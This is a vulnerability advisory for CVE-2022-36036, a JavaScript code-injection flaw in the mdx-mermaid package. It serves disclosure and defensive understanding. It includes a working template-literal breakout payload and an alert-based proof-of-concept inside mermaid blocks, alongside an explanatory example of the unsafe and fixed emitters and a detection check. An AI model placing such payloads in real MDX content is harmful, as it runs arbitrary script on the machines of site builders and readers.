GHSA-rvgm-35jw-q628: Improper Control of Generation of Code ('Code Injection') in mdx-mermaid

Impact

Arbitrary JavaScript injection

Add the following to any mermaid code block; the JavaScript placed inside the function body executes when the component is loaded by MDXjs.

```js
` + (function () {
  // Put Javascript code here
  return ''
}()) + `
```

The block below shows a valid mermaid code block

```mermaid
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

The same block but with the exploit added

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```
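To make the "improper control of generation of code" concrete, here is an added example (not mdx-mermaid's own code): a hypothetical MDX-style emitter that builds component source by splicing the diagram text into a template literal, beside a fixed emitter that serialises the text with `JSON.stringify`, plus a check that flags diagram text able to break out of a template literal. The names `unsafeEmit`, `safeEmit`, `loadGenerated` and `containsTemplateBreakout` and the sample diagrams are assumptions constructed for this example.

```javascript
// Added example: a minimal model of the injection class in this advisory,
// NOT mdx-mermaid's own code. An MDX plugin turns a ```mermaid fence into
// generated JavaScript that embeds the diagram text. The "unsafe" builder
// splices that text straight into a template literal; the "safe" builder
// emits a proper string literal, so the text can only ever be data.

// Constructed samples: a clean diagram and the injection shape from the advisory.
const cleanDiagram = "graph TD;\n    A-->B;\n    A-->C;";
const injectedDiagram =
  "` + (function () {\n  globalThis.ran = true\n  return ''\n}()) + `\n" +
  cleanDiagram;

// Vulnerable pattern (hypothetical): raw concatenation into a template literal.
// A leading backtick in the diagram closes the literal early and everything
// that follows is parsed as code.
function unsafeEmit(chart) {
  return "const chart = `" + chart + "`;\nreturn chart;";
}

// Fixed pattern (hypothetical): serialise the text as a JS string literal.
// JSON.stringify escapes quotes, backslashes and newlines, and a backtick
// or ${ inside a double-quoted string has no special meaning.
function safeEmit(chart) {
  return "const chart = " + JSON.stringify(chart) + ";\nreturn chart;";
}

// Stand-in for MDX compiling and loading the generated component source.
// Returns the chart text the generated code yields and whether the marker ran.
function loadGenerated(source) {
  globalThis.ran = false;
  const chart = new Function(source)();
  return { chart, ran: globalThis.ran };
}

// Defender-side check: does the diagram text contain anything that could
// escape a template literal (backtick, backslash or ${ interpolation)?
function containsTemplateBreakout(chart) {
  return /[`\\]|\$\{/.test(chart);
}
```

With `unsafeEmit` the injected diagram runs the embedded function and silently drops the injected prefix from the chart text; with `safeEmit` nothing runs and the text round-trips unchanged.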

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

References

  • GHSA-rvgm-35jw-q628
  • https://nvd.nist.gov/vuln/detail/CVE-2022-36036
  • sjwall/mdx-mermaid@f2b9938

Related news

CVE-2022-36036: Improper Control of Generation of Code ('Code Injection') in mdx-mermaid

mdx-mermaid provides plug and play access to Mermaid in MDX. There is a potential for an arbitrary javascript injection in versions less than 1.3.0 and 2.0.0-rc1. Modify any mermaid code blocks with arbitrary code and it will execute when the component is loaded by MDXjs. This vulnerability was patched in version(s) 1.3.0 and 2.0.0-rc2. There are currently no known workarounds.